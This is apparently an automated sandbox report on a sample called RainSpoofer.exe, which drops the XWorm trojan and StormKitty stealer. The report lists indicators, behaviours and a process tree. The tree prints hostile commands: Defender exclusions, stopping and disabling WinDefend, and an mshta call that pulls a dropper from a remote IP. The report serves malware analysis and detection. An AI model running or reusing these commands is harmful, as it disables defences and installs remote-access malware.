Analysis

  • max time kernel
    776s
  • max time network
    773s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    17-01-2025 15:25

General

  • Target

    RainSpoofer.exe

  • Size

    79KB

  • MD5

    d3a8594fc1452f12c757b13b35124ef3

  • SHA1

    3a3f12831496f23327c9dd746ae3ed1a23cfa30d

  • SHA256

    c61acd5b9f26fa5e7a8e4029791d47d665d9ae4813a79bab12fc05743eda51e7

  • SHA512

    d844f99a52c8abb19a67e83ba6ed22c856a506b8dc250aba1a5976aee5ffd897e47c9dc9ed607d4dd14b299ff70fffb00041773e0ffe47fc95bc6a68b5ffec97

  • SSDEEP

    1536:Zw47U6Uv4H7VZWg0HXsre6qYOM00ZMpwC07Bc7:Z2v4zWg0H8hEDwX7Bc7

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://78.26.187.35/soft-usage/favicon.ico?0=1200&1=KHBTHJFA&2=i-s&3=61&4=7601&5=6&6=1&7=99600&8=1033

Extracted

Family

xworm

C2

trip-thesaurus.gl.at.ply.gg:16715

Attributes
  • Install_directory

    %AppData%

  • install_file

    USB.exe

Signatures

  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Detect Xworm Payload 2 IoCs
  • Disables service(s) 3 TTPs
  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 1 IoCs
  • Stormkitty family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.

  • Disables Task Manager via registry modification
  • Stops running service(s) 4 TTPs
  • Drops startup file 2 IoCs
  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utility to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 15 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 44 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 18 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 15 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\RainSpoofer.exe
    "C:\Users\Admin\AppData\Local\Temp\RainSpoofer.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2348
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAZABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAeQBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAYwBiACMAPgA="
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2360
    • C:\Users\Admin\AppData\Roaming\OBSStudio-30.0-Full-Installer-x64.exe
      "C:\Users\Admin\AppData\Roaming\OBSStudio-30.0-Full-Installer-x64.exe"
      2⤵
      • Drops startup file
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2072
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\OBSStudio-30.0-Full-Installer-x64.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2576
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'OBSStudio-30.0-Full-Installer-x64.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2632
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\SecurityHealthSystray'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1568
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SecurityHealthSystray'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:536
      • C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\ualwvd.html
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1748
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1748 CREDAT:275457 /prefetch:2
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:2672
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1748 CREDAT:340994 /prefetch:2
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:2928
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1748 CREDAT:275490 /prefetch:2
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:2328
      • C:\Windows\system32\CMD.EXE
        "CMD.EXE"
        3⤵
        PID:348
      • C:\Windows\System32\taskkill.exe
        "C:\Windows\System32\taskkill.exe" /im ngrok.exe /f
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2432
      • C:\Users\Admin\AppData\Local\Temp\ngrok.exe
        C:\Users\Admin\AppData\Local\Temp\ngrok.exe config add-authtoken Your_Authtoken
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:2832
      • C:\Windows\system32\cmd.exe
        cmd.exe /c start calc
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1308
        • C:\Windows\system32\calc.exe
          calc
          4⤵
          PID:1816
      • C:\Windows\system32\cmd.exe
        cmd.exe
        3⤵
        PID:1384
      • C:\Windows\system32\cmd.exe
        cmd
        3⤵
        PID:2860
      • C:\Windows\system32\cmd.exe
        cmd.exe /c start cmd
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1632
        • C:\Windows\system32\cmd.exe
          cmd
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2788
          • C:\Windows\system32\ipconfig.exe
            ipconfig
            5⤵
            • Gathers network information
            PID:1868
      • C:\Users\Admin\AppData\Local\Temp\rzbuip.exe
        "C:\Users\Admin\AppData\Local\Temp\rzbuip.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:232
        • C:\Windows\SysWOW64\sc.exe
          sc stop WinDefend
          4⤵
          • Launches sc.exe
          • System Location Discovery: System Language Discovery
          PID:2228
        • C:\Windows\SysWOW64\sc.exe
          sc config WinDefend start= disabled
          4⤵
          • Launches sc.exe
          • System Location Discovery: System Language Discovery
          PID:572
        • C:\Users\Admin\AppData\Roaming\ceoeta.exe
          C:\Users\Admin\AppData\Roaming\ceoeta.exe
          4⤵
          • Modifies WinLogon for persistence
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:2572
          • C:\Windows\SysWOW64\sc.exe
            sc stop WinDefend
            5⤵
            • Launches sc.exe
            • System Location Discovery: System Language Discovery
            PID:484
          • C:\Windows\SysWOW64\sc.exe
            sc config WinDefend start= disabled
            5⤵
            • Launches sc.exe
            • System Location Discovery: System Language Discovery
            PID:1200
          • C:\Windows\SysWOW64\mshta.exe
            mshta.exe "http://78.26.187.35/soft-usage/favicon.ico?0=1200&1=KHBTHJFA&2=i-s&3=61&4=7601&5=6&6=1&7=99600&8=1033"
            5⤵
            • Blocklisted process makes network request
            • System Location Discovery: System Language Discovery
            PID:1464
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\rzbuip.exe" >> NUL
          4⤵
          • System Location Discovery: System Language Discovery
          PID:856
      • C:\Users\Admin\AppData\Local\Temp\kvcsdt.exe
        "C:\Users\Admin\AppData\Local\Temp\kvcsdt.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:940
  • C:\Windows\system32\AUDIODG.EXE
    C:\Windows\system32\AUDIODG.EXE 0x148
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2000
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:716
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:1032

Network

MITRE ATT&CK Enterprise v15

Downloads

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

            Filesize

            342B

            MD5

            73ac28fa873a0776b2872676e1974687

            SHA1

            576e7b7e9a591dc6cefcd5bdfed5e38d3920f5b7

            SHA256

            79c48738e1ab7d38226dcf64996b63d6bc84a92cd4910751473602376f9432a7

            SHA512

            6de800abdcc1a2f2d19900c41bd9f05c3003b945fc7ec426c0a3b4011ed0cbc8bc362c480588abfdd0645ee11fdcc18e84d88733da738320c47b7f422ae1711b

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

            Filesize

            342B

            MD5

            a51d1ce4a04b6b96a547c82b941cf90d

            SHA1

            9cc63d1ea8f0dfb9658d6298e136cb26decd44c1

            SHA256

            86253532a45e6ae4722b6724d65e98b64cb33dd04f2a42950076620b5bc3f882

            SHA512

            4d62e9f8cacb88f19b959230929b4ea091a04c23e1477d38511d6ab3bbdf1184ab1a969392b768e3114098a9d5399886ab6f9fcb1b2f5772253fb6413c0e8dfb

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

            Filesize

            342B

            MD5

            16d6c9fe1abff9f5476367bbc43b2211

            SHA1

            f7bcffb4f2f60c974fc9341dccf262f151dc3ea3

            SHA256

            0db6ecc999db950d986883e3ffa03e06c56ac8c2fc7d9056cae9fdf58aae347e

            SHA512

            d95ac189911faaaa0ae77e15f3952bf1550caefd998d5d69746147f4e12ed9afec7e0c3031471a08ebf9106a07ebfb545251c7afdebb4845d3305345619fe93c

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

            Filesize

            342B

            MD5

            5e007662679748f73853d36b5f442d25

            SHA1

            8dd2d476bbe1a3ec739aab606a0a0f51ef993b98

            SHA256

            a94949a98ba25df0879a012e4b10a703d5a4082766c2e21de27a342c2fe78928

            SHA512

            b29b80feb4d4496dffb982d1e82007030eb4667caee55f7e7ed4bdf2fa51a66a57ffc20dcd1711fb862de6554f78aca938a9cf00be1d9b33885db9daf4a03d8e

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

            Filesize

            342B

            MD5

            aa7ba30b2d9aa1217674eb3964a42466

            SHA1

            56000004eafd8c4ebcf4c0e6e04bf923da4b39ca

            SHA256

            7cfb52b58c89b95c277d829bd47757572a72074f9ab4246007daa725af4619ca

            SHA512

            466c327a9b95e9096ef1f84383805f99663fb9dc608ef64b7383dbd0577679e5a6f032a065b1f09f0303ab74805f8fde98c70ba704187a6a1f1aaf92142a6680

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

            Filesize

            342B

            MD5

            f7502fd3a502c6b1451d2a0d9a238f55

            SHA1

            41381175e7ffc5abdd513a04ab64c77899d79b74

            SHA256

            527325f68157e3ed7f49c610ab01af902f062a8fca0d1b990ef5eef87da76bb5

            SHA512

            422e22f871bb72ee7640589bdb13fd2bd13ef090a32944d6dd2736020732469cd0098ce7b590cc81c70932388f9ad1ed12d86074c777333317745cce922a08a5

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

            Filesize

            342B

            MD5

            e6c9be6a5a7f19a00994732c53794eeb

            SHA1

            ca2313064cd83644251336d1b8a9a4e5a3db8ddf

            SHA256

            147b1ec0ccca54093bd29bf94d2bf8bf1b65cf07805bc37b5d9a8170b48edbc3

            SHA512

            928d58498466f6fe096a6d736f4341bc3dc02bb50a127675f3f5797e7f083e1619c8e0ff73568ab084f5e92c47617924a522b9e21e95048794f630fa4a3ba5d6

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

            Filesize

            342B

            MD5

            290b77bc808aad185fec63e23d822cf9

            SHA1

            fe6e9ee3956af880ada84128640679fcde3ec60d

            SHA256

            4918443af2e267ba3c7061fe5b3310dc2df6ae51a0173139ec6cf30b5e3bb555

            SHA512

            6d7a90c2b4addea631307490c82b7314c5572530b8e292dcbf165261da9ac55d33f75a5d700519cf9e10db10329f4a4d2cbcf04ef2bfcbf3a4a31b5f53e28f91

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

            Filesize

            342B

            MD5

            6534f527f4b1c9f1b892d39ae093954f

            SHA1

            4a32a4f751b20e400333cdabebc8658997630e4b

            SHA256

            7c921eb6871b7331bb12b824ee16ea7291d3ea3a5847d69fc02a96326fc42535

            SHA512

            3f38d0fe7006f19af71e12af25fd79ffdac87f3cfe9b648a4e3d7c2f1c96e9d1fa204e075de37984d326b01c55619a27776f3804908cf205059c3ec67436c58c

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

            Filesize

            342B

            MD5

            d36480a2732e0551e8b4382ce3f5f9d5

            SHA1

            b3acdeed77a1958ed93629c1aef90430c381c53f

            SHA256

            caa7617523e5fb3443e24196f3d320f6cb12b34de8b8b53f3a25b88b62663a00

            SHA512

            a864fefacfa341b7f93b10236beafb000975063adf70b5e63838e7128e3ac34d77546ddfa4218211a7ab4ca1a87cfb59d6ff1b443f29f8a84737fd3c555afd61

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

            Filesize

            342B

            MD5

            2b282c9c713be0473f35a80703f0e6f1

            SHA1

            474109f65010eaaa543336a737fa8659181945e9

            SHA256

            be537b5c901c129f9c62e1b6f04cedf40fec100eef9048cd62c26b202e950d23

            SHA512

            e2e989f67e44414fa711a1bfb64ba5618663b52b60017db30ea30a252588e8791768ccfc989ad1362dc8b0fba5f8a3b8884bc9b28846e9b7bdb6cc9ccbbcb91b

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

            Filesize

            342B

            MD5

            561d64917fd49ff247454f6ec0320090

            SHA1

            fb3b8abf8e9ce25fc0eb7b438dc6c14fda839cae

            SHA256

            20008c1935298189d0c6f1ba5cf46ff5a05b1f6c49c0031a416d50a1db8ec41b

            SHA512

            53cbe035e33bc02864b4191708cc02c7b838f47040b1be68d0e37ace17228c27a0db0426213c28c235c921dae77f8fc62e5fd5f75a92737d4c347538002518be

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

            Filesize

            342B

            MD5

            caec795297641d9ba6455cfb51bf2f5b

            SHA1

            4cc5817f23da046b1c247dc9597092ba762541f3

            SHA256

            cafced0549661fa0e7948ad687acbe935d0ff40daca34fff6f50f0c845b6722a

            SHA512

            83ca7679fc502f6c29e92de0797c96a7c675e6208a89bca0f2c2f848c738c9baec3a3eb1e795544eea52e10618c560cd1a85203db3d3dddf3cea5b98c5c1ffae

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

            Filesize

            342B

            MD5

            d240c6c81e2d761d5d513cf0ecb9376e

            SHA1

            b30a6de6ab5e0b157f3538223c74ed1b6be6f33e

            SHA256

            26d4bfef45bcc7ead274f39ba5dafb017d2214a0e475e1975586ab3000c3097f

            SHA512

            7177320a1b1f758d02791a4eb593f5bac3b8963359a7f852f60aa0dcc5709e380a1b50fdb9cf058fd69e071144773519fc6c6660b379f0d8d94b1f7d196e1260

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

            Filesize

            342B

            MD5

            b1d514f1fb516d2b15b34ffa5b378066

            SHA1

            93107f308c10e993a4a22c9459f59b87b9434484

            SHA256

            edc442c619bcc40d42461f8881e4bb027c9bddeffa9501703964f28ecd5b6680

            SHA512

            09634a1bebadcdc58d955d9f37aa793387230ac26b10741d9256943f31c5014ec46b6c83b763b3c4b2d75fc983b580a58d345f1e892a014343ed77142a04aac8

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

            Filesize

            342B

            MD5

            87d9556edf0d81aaa294104fa3259365

            SHA1

            4b1a9cb8934302ebe01c2562488c022b927f40d3

            SHA256

            c0b2c9f034393bbbc9603e19ba37a5f9669bde92bfe4d205d49ec31d6aa3a09c

            SHA512

            baa0ad1c4fc3ee7c8ac15694cd4a10ce9efc42174d36d3f4521fff2ca11045b97e76d1d1c7cfc0f30e79e881507e227255b41be7943bbe856dff9d1110cc87de

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

            Filesize

            342B

            MD5

            dbe6a47ba659d7d217bef2c0352e35bc

            SHA1

            41d12f1b0b8befe2e7d895f029e69a1ef358565c

            SHA256

            80f9f64557b2f476b2539966f7b8bb226edafceeea9e8fd11f2bc58699494dd3

            SHA512

            45f6d013d8a8b555c92f2731d4db0a6e6faf2745ec267157fd8fd6f906e8defb8f1d0aeed5726554e55c4094874baaf6868d0ca938152c20c37e1770e04efc05

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

            Filesize

            342B

            MD5

            054013d38e6fcb11c837073e358360ee

            SHA1

            b16ed1414a31792e3b6e49ec8d9ec2a41d57d518

            SHA256

            875c57af850dc079ed94418716733038965f6c261c9f89922ba22b3480f67687

            SHA512

            7fb70b8216b863e93e3888d739ae06bb029a47c567e96827217deb8d7d635e8392a4195f04d7ab2b8d09448a896788d494b7454525e92e4e0738f7f906f39be5

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

            Filesize

            342B

            MD5

            cc58263d759ef8c8ddab728f1eb9733b

            SHA1

            2ed4d85f34bb373dc9cc8d71dfa2ecf2dcf90ab4

            SHA256

            c6e9b9bdb5ab75cb1ee100a1e89167d6995fd490f8948c09e582071fcb78483e

            SHA512

            a45de17f10ba1d2e98d7333581899f95d44e6486788c23da451bc351db0009a0bd0540a4c364966090052748d56698359989c6044f326475c4009d98a3851f5d

          • C:\Users\Admin\AppData\Local\Temp\CabC719.tmp

            Filesize

            70KB

            MD5

            49aebf8cbd62d92ac215b2923fb1b9f5

            SHA1

            1723be06719828dda65ad804298d0431f6aff976

            SHA256

            b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

            SHA512

            bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

          • C:\Users\Admin\AppData\Local\Temp\TarC78A.tmp

            Filesize

            181KB

            MD5

            4ea6026cf93ec6338144661bf1202cd1

            SHA1

            a1dec9044f750ad887935a01430bf49322fbdcb7

            SHA256

            8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

            SHA512

            6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

          • C:\Users\Admin\AppData\Local\Temp\kvcsdt.exe

            Filesize

            666KB

            MD5

            989ae3d195203b323aa2b3adf04e9833

            SHA1

            31a45521bc672abcf64e50284ca5d4e6b3687dc8

            SHA256

            d30d7676a3b4c91b77d403f81748ebf6b8824749db5f860e114a8a204bca5b8f

            SHA512

            e9d4e6295869f3a456c7ea2850c246d0c22afa65c2dd5161744ee5b3e29e44d9a2d758335f98001cdb348eaa51a71cd441b4ddc12c8d72509388657126e69305

          • C:\Users\Admin\AppData\Local\Temp\ngrok.exe

            Filesize

            16.4MB

            MD5

            ee2397b5f70e81dd97a4076ba1cb1d3a

            SHA1

            8350f648ebd269b4bca720b4143dd3edcdfafa8f

            SHA256

            b5b1454e2e3a66edf3bde92b29a4f4b324fa3c3d88dc28e378c22cb42237cc67

            SHA512

            57fc76393881c504ac4c37a8ea812a7e21f2bed4ffa4de42a2e6e4558a78bba679ec0f8fcdc39798306c3a97e424fb875680b7f78ac07be3f7f58df093575562

          • C:\Users\Admin\AppData\Local\Temp\rzbuip.exe

            Filesize

            2.2MB

            MD5

            7dde6427dcf06d0c861693b96ad053a0

            SHA1

            086008ecfe06ad06f4c0eee2b13530897146ae01

            SHA256

            077c04ee44667c5e1024652a7bbe7fff81360ef128245ffd4cd843b7a56227cf

            SHA512

            8cf162f83ebfa2f3db54b10d5b0e6af590e97596ac2d469058a98340bf27de2866e679c777aa46dd530db44c27503d4cea8c34d96cb83b71477a806b5ab7c1b9

          • C:\Users\Admin\AppData\Local\Temp\ualwvd.html

            Filesize

            4KB

            MD5

            fdf28aff8eae344f0da5daebf2cad646

            SHA1

            fb8901df1e495e1336b5c0199d5fcea0dc5e23bc

            SHA256

            886672dec37fc05765bb5a8ffd357f9122e05d971f77ed3b7f723d81ad7de4f6

            SHA512

            542be402525600bcbe8c2b953057aba223d5f22dda5b261d7ad7d5d5213d500a0e8e7f6331105040b511bfdf0b301496fa99bc93f0d16d212f507bd13810db63

          • C:\Users\Admin\AppData\Local\Temp\~DF104C860C883EBA9F.TMP

            Filesize

            16KB

            MD5

            5d0eca7a0bd2fc4b3617155208ec201a

            SHA1

            1220a3af934d9e89236b59476601922ecc8df9ec

            SHA256

            6b50d23e71d49005887d3fde772cf921bf72bf16eba1db883fe280d27878f303

            SHA512

            75ee27c8bfc0ed2328374fdc719eb1771535743f782249133255c84ca5883ee147b2fb7b850cc8d9ece2b5e49234657c8c88df80aef558a9b54de9c2e8d58b55

          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UI5UKI2HFFY7GT7YWAMR.temp

            Filesize

            7KB

            MD5

            051c06271a6b2e3a3e953d8587063cab

            SHA1

            72218dea89cfd8b40ea91f4b91a073b00e6806b8

            SHA256

            a5bbcf018c54bf3b8645183eb843ff58fb48533a7f6c51fd209eaceb3694b0b3

            SHA512

            05d3bce780fd12e4c7f6a3c249c20e1acc76e67b7225994ef05f99db24893af4d7fe2bc5019dd4c88b1566861f68f4b9a61685fe0ab0aac09be132c01767e460

          • C:\Users\Admin\AppData\Roaming\OBSStudio-30.0-Full-Installer-x64.exe

            Filesize

            73KB

            MD5

            798979d8ea2bfdd4beaa6bcfb0d1525d

            SHA1

            98fe241fb460c7b2ef6d934425751afc7d41fd3c

            SHA256

            02ecf9cda88cc034e10bc28e8d7895705483b5f088b5658ad28d000ca8474eb9

            SHA512

            ec712552ec27d5befa1fae10d0785e04014a94b8786ec5b6645e171136a93d824aa103dd2635941c9f50b88039812d868839c7779f85b0a2cca53aacfe145499

          • memory/232-984-0x0000000000400000-0x0000000000843000-memory.dmp

            Filesize

            4.3MB

          • memory/232-996-0x0000000000400000-0x0000000000843000-memory.dmp

            Filesize

            4.3MB

          • memory/232-994-0x00000000047E0000-0x0000000004C23000-memory.dmp

            Filesize

            4.3MB

          • memory/716-473-0x0000000140000000-0x00000001405E8000-memory.dmp

            Filesize

            5.9MB

          • memory/716-479-0x0000000140000000-0x00000001405E8000-memory.dmp

            Filesize

            5.9MB

          • memory/716-472-0x0000000140000000-0x00000001405E8000-memory.dmp

            Filesize

            5.9MB

          • memory/940-1006-0x0000000000400000-0x00000000005CC000-memory.dmp

            Filesize

            1.8MB

          • memory/940-1005-0x0000000000400000-0x00000000005CC000-memory.dmp

            Filesize

            1.8MB

          • memory/2072-921-0x000000001A950000-0x000000001A95E000-memory.dmp

            Filesize

            56KB

          • memory/2072-922-0x000000001B270000-0x000000001B27A000-memory.dmp

            Filesize

            40KB

          • memory/2072-923-0x000000001C730000-0x000000001C7E0000-memory.dmp

            Filesize

            704KB

          • memory/2072-924-0x000000001DFE0000-0x000000001E6EC000-memory.dmp

            Filesize

            7.0MB

          • memory/2072-37-0x000000001A7C0000-0x000000001A7CC000-memory.dmp

            Filesize

            48KB

          • memory/2072-951-0x000000001D230000-0x000000001D34E000-memory.dmp

            Filesize

            1.1MB

          • memory/2072-8-0x0000000001010000-0x0000000001028000-memory.dmp

            Filesize

            96KB

          • memory/2572-997-0x0000000000400000-0x0000000000843000-memory.dmp

            Filesize

            4.3MB

          • memory/2572-999-0x0000000000400000-0x0000000000843000-memory.dmp

            Filesize

            4.3MB

          • memory/2576-14-0x000000001B590000-0x000000001B872000-memory.dmp

            Filesize

            2.9MB

          • memory/2576-15-0x0000000002860000-0x0000000002868000-memory.dmp

            Filesize

            32KB

          • memory/2632-21-0x000000001B6C0000-0x000000001B9A2000-memory.dmp

            Filesize

            2.9MB

          • memory/2632-22-0x0000000002920000-0x0000000002928000-memory.dmp

            Filesize

            32KB